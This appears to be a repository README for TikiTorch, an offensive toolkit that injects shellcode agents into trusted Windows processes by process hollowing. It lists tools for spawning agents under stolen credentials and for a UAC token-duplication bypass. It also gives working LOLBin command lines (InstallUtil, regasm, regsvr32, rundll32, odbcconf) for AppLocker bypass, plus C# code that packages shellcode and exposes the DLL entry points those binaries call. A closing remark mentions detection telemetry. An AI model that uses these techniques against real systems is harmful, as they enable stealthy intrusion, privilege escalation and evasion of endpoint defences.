Process Hollowing
Latest commit f60e22e Apr 14, 2019
  *   )           )         *   )                        )  
` )  /(   (    ( /(   (   ` )  /(         (           ( /(  
 ( )(_))  )\   )\())  )\   ( )(_))   (    )(     (    )\()) 
(_(_())  ((_) ((_)\  ((_) (_(_())    )\  (()\    )\  ((_)\  
|_   _|   (_) | |(_)  (_) |_   _|   ((_)  ((_)  ((_) | |(_) 
  | |     | | | / /   | |   | |    / _ \ | '_| / _|  | ' \  
  |_|     |_| |_\_\   |_|   |_|    \___/ |_|   \__|  |_||_| 

Intro

TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process, writes the desired shellcode into that process, then uses CreateRemoteThread to run it there. Both the target process and the shellcode are specified by the user.

This is pretty flexible as it allows an operator to run an HTTP agent inside a process that is expected to talk HTTP, such as iexplore.exe, rather than something more arbitrary and conspicuous like rundll32.exe.

TikiTorch follows the same concept but uses Process Hollowing techniques instead of CreateRemoteThread (CRT). With hollowing the target process is created suspended, the payload is placed in the new process's memory, and the process's own primary thread is resumed to run it, so no additional thread is injected into the target.

Usage

TikiTorch is a Visual Studio solution (TikiTorch.sln), split into 6 projects.

  • TikiLoader
  • TikiSpawn
  • TikiSpawnAs
  • TikiSpawnElevated
  • TikiCpl
  • TikiThings

TikiLoader

A .NET library that contains all the process hollowing code; it is referenced by the other Tiki projects.

TikiSpawn

A .NET library designed to bootstrap an agent from an initial delivery mechanism; it can be used with DotNetToJScript in conjunction with LOLBins.

TikiSpawnAs

A .NET exe used to spawn agents under different credentials.

```text
> TikiSpawnAs.exe
  -d, --domain=VALUE         Domain (defaults to local machine)
  -u, --username=VALUE       Username
  -p, --password=VALUE       Password
  -b, --binary=VALUE         Binary to spawn & hollow
  -h, -?, --help             Show this help
```

TikiSpawnElevated

A .NET exe used to spawn a high integrity agent using the UAC Token Duplication bypass. The optional `-p` flag selects which elevated process's token is duplicated.

```text
> TikiSpawnElevated.exe
  -b, --binary=VALUE         Binary to spawn & hollow
  -p, --pid=VALUE            Elevated PID to impersonate (optional)
  -h, -?, --help             Show this help
```

TikiCpl

Generates a Control Panel (.cpl) formatted DLL that executes gzipped, base64-encoded shellcode stored in a resource. Follow the instructions here to generate shellcode in the correct format (Get-CompressedShellcode.ps1 in the repository root produces it).
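As an added example, not TikiCpl's or Get-CompressedShellcode.ps1's own code, the two halves of the "gzipped, base64-encoded" format: a producer that builds the string from raw bytes, and a consumer that turns a stored string (or an embedded resource) back into bytes and fails loudly on corrupt input. The resource name `Payload.b64` and the sample byte pattern are assumptions of this example.

```csharp
// Added example (not TikiCpl's code): encode and decode the gzip + base64 shellcode format.
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;

public static class ShellcodeFormat
{
    // Producer: gzip the raw bytes, then base64 the compressed stream. Disposing the GZipStream
    // before reading the buffer is what writes the gzip footer (CRC32 + length); skipping that
    // is the usual cause of "invalid data" on the consumer side.
    public static string Encode(byte[] raw)
    {
        using (var buffer = new MemoryStream())
        {
            using (var gz = new GZipStream(buffer, CompressionMode.Compress, leaveOpen: true))
                gz.Write(raw, 0, raw.Length);
            return Convert.ToBase64String(buffer.ToArray());
        }
    }

    // Consumer: reverse the two layers. Convert.FromBase64String rejects malformed text and
    // GZipStream throws InvalidDataException on a bad header or CRC, so a truncated or edited
    // resource fails here instead of being handed to the loader as "shellcode".
    public static byte[] Decode(string encoded)
    {
        using (var input = new MemoryStream(Convert.FromBase64String(encoded)))
        using (var gz = new GZipStream(input, CompressionMode.Decompress))
        using (var output = new MemoryStream())
        {
            gz.CopyTo(output);
            return output.ToArray();
        }
    }

    // Consumer variant that pulls the string out of an embedded resource (name is an assumption).
    public static byte[] DecodeFromResource(Assembly asm, string resourceName = "Payload.b64")
    {
        using (var stream = asm.GetManifestResourceStream(resourceName))
        {
            if (stream == null) throw new FileNotFoundException("embedded resource not found", resourceName);
            using (var reader = new StreamReader(stream))
                return Decode(reader.ReadToEnd());
        }
    }

    public static void Main()
    {
        // Constructed sample bytes standing in for shellcode; a repeating pattern so gzip has something to do.
        var sample = new byte[4096];
        for (int i = 0; i < sample.Length; i++) sample[i] = (byte)(i % 7);

        string encoded = Encode(sample);
        byte[] decoded = Decode(encoded);
        bool same = decoded.Length == sample.Length;
        for (int i = 0; same && i < sample.Length; i++) same = decoded[i] == sample[i];
        Console.WriteLine("raw " + sample.Length + " bytes -> " + encoded.Length + " chars, round trip ok: " + same);

        try { Decode(encoded.Substring(0, encoded.Length / 2)); }   // truncated resource
        catch (Exception e) { Console.WriteLine("truncated input rejected: " + e.GetType().Name); }
    }
}
```

Real shellcode is high-entropy and will not compress much; the gzip layer mainly buys a uniform container with its own integrity check, and base64 keeps the blob safe to embed as a string resource.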

TikiThings

A DLL that exposes the AppLocker bypass entry points from AllTheThings, so it can be loaded through the following signed Windows binaries:

```text
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U TikiThings.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U TikiThings.dll
regsvr32 /s /u TikiThings.dll
regsvr32 /s TikiThings.dll
rundll32 TikiThings.dll,EntryPoint
odbcconf /s /a { REGSVR TikiThings.dll }
regsvr32 /s /n /i:"blah" TikiThings.dll
```
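The following is an added example, not TikiThings' code, showing what each of those command lines actually invokes inside the DLL: InstallUtil `/U` calls `Uninstall` on any `[RunInstaller(true)]` type, regasm `/U` calls a `[ComUnregisterFunction]`, and regsvr32, rundll32 and odbcconf call native exports by name. A plain .NET assembly has no native exports, so the example assumes the `DllExport` attribute from the RGiesecke.DllExport / 3F DllExport NuGet package (an assumption, not something the page states). The `Payload.Run` sink only records which path fired.

```csharp
// Added example (not TikiThings' code): one managed DLL reachable from each LOLBin listed above.
using System;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;       // reference System.Configuration.Install.dll
using System.Runtime.InteropServices;
using RGiesecke.DllExport;               // assumed: DllExport NuGet package provides native exports

namespace LolbinEntryPoints
{
    // Every entry point funnels here. In a loader this is where the hollowing would start;
    // for this example it just records and prints which path was taken.
    public static class Payload
    {
        public static string LastTrigger;
        public static void Run(string trigger)
        {
            LastTrigger = trigger;
            Console.WriteLine("triggered via " + trigger);
        }
    }

    // InstallUtil.exe /U <dll>: InstallUtil loads the assembly, finds types marked
    // [RunInstaller(true)] and, because of /U, calls Uninstall() on them (no admin required).
    [RunInstaller(true)]
    public class InstallUtilHook : Installer
    {
        public override void Uninstall(IDictionary savedState) { Payload.Run("InstallUtil /U"); }
    }

    // regasm.exe /U <dll>: regasm calls the [ComUnregisterFunction] of each ComVisible type.
    // Without /U it would call a [ComRegisterFunction], which writes HKCR and needs admin.
    [ComVisible(true)]
    public class RegAsmHook
    {
        [ComUnregisterFunction]
        public static void Unregister(Type t) { Payload.Run("regasm /U"); }
    }

    // Native exports (emitted by the assumed DllExport attribute; build for x86 or x64, not AnyCPU).
    public static class NativeExports
    {
        // regsvr32 /s <dll> and odbcconf /a { REGSVR <dll> } both call DllRegisterServer.
        [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
        public static int DllRegisterServer() { Payload.Run("DllRegisterServer"); return 0; }   // S_OK

        // regsvr32 /s /u <dll> calls DllUnregisterServer.
        [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
        public static int DllUnregisterServer() { Payload.Run("DllUnregisterServer"); return 0; }

        // regsvr32 /s /n /i:"blah" <dll>: /n skips DllRegisterServer, /i calls DllInstall(TRUE, L"blah").
        [DllExport("DllInstall", CallingConvention = CallingConvention.StdCall)]
        public static int DllInstall(bool install, [MarshalAs(UnmanagedType.LPWStr)] string cmdLine)
        { Payload.Run("DllInstall(" + install + ", \"" + cmdLine + "\")"); return 0; }

        // rundll32 <dll>,EntryPoint calls EntryPoint(HWND, HINSTANCE, LPSTR cmdline, int nCmdShow).
        [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
        public static void EntryPoint(IntPtr hwnd, IntPtr hinst,
                                      [MarshalAs(UnmanagedType.LPStr)] string cmdLine, int nCmdShow)
        { Payload.Run("rundll32 EntryPoint"); }
    }
}
```

The `/U`, `/u` and `/n` switches are what keep these paths usable from a standard user: the register-side functions would try to write to HKCR and fail or prompt, while the unregister and DllInstall paths still load the DLL and run managed code, which is the AppLocker bypass the page refers to. Detection-wise, each of these is a signed Microsoft binary loading a DLL from a non-standard path, so the host binary, its command line and the loaded module path are the telemetry to watch.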

Credits

Further Reading
